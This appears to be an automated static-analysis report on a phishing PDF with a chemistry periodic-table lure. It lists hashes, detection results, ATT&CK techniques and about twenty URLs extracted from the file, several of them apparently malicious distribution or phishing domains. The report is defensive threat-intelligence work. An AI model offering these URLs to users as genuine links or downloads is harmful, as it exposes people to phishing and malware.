Malicious PDF — malware analysis report

Static analysis result for SHA-256 100b83de5dca0cb0…

MALICIOUS

PDF

65.4 KB Created: 2021-04-01 18:09:34 +03:00 Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7)
MD5: 78e490e00217add1779b868c686d1eca SHA-1: 0d927ea25378954b2b15a4a1b0ae3cd4130a2003 SHA-256: 100b83de5dca0cb0162dc5369afb6f9b30a003da0f2c3e3e197e35e7af3d5eb8
94 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.007 JavaScript

The file is identified as malicious by ClamAV and an ML classifier. It contains an embedded URI pointing to a suspicious domain, which is likely part of a phishing or malware distribution scheme. The document body, though heavily obfuscated, suggests a lure related to a chemistry periodic table, aiming to trick the user into clicking the malicious link.

Machine Learning

  • Nyx PDF Classifier malicious score 0.8603

Heuristics 3

  • ClamAV: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://vilenefex.ru/award?keyword=chemistry+periodic+table+with+names+pdf
    • http://swiss-gear-top.xyz/447373384681p729.pdf
    • http://xuvaxujogilo.mygamesonline.org/redhat_ceph_storage.pdf
    • http://totakonepis.iblogger.org/fizasegonupixibi.pdf
    • https://cdn-cms.f-static.net/uploads/4475219/normal_5fd25fff00288.pdf
    • http://jitokinut.iblogger.org/rimworld_ice_sheet_challenge.pdf
    • http://3bureaureport.info/sony_pslx300usb_usb_stereo_turntable_softwarenas03.pdf
    • http://noxiliko.iblogger.org/10375059208.pdf
    • http://select-get.top/how_to_tell_if_bike_is_running_leandj9ax.pdf
    • https://static.s123-cdn-static.com/uploads/4377928/normal_5ffc222cc6751.pdf
    • http://static-get.top/jisokafoveweduxabkjgz.pdf
    • http://busijizi.medianewsonline.com/pathogenicity_test_of_fungi.pdf
    • http://www.ascendercorp.com/
    • http://www.ascendercorp.com/typedesigners.html
    • https://s3.amazonaws.com/jarirotexab/vapour_absorption_chiller_working_principle.pdf
    • https://s3.amazonaws.com/tasufagijaremo/johan_galtung_teoria_del_conflicto_libro.pdf
    • https://s3.amazonaws.com/woberiz/lidipines.pdf
    • http://rosevasejila.myartsonline.com/91201769000.pdf
    • http://bifovigavij.myartsonline.com/82770447166.pdf
    • http://tositasi.epizy.com/guzubikesotakizobo.pdf
    • http://tekefugenira.epizy.com/firefumosukumikune.pdf
    • https://s3.amazonaws.com/rokuwapesu/lexique_mathmatique_anglais_franais.pdf
    • http://scripts.sil.org/OFL

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
font_00_sfnt_off0000de6d.bin
1591321cf6f0408424bc6d85e37fca7adae5ee1c142dadf2bf8a3803fa95b5cb		 pdf-font-stream PDF embedded font (sfnt) at offset 0xDE6D 5540 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.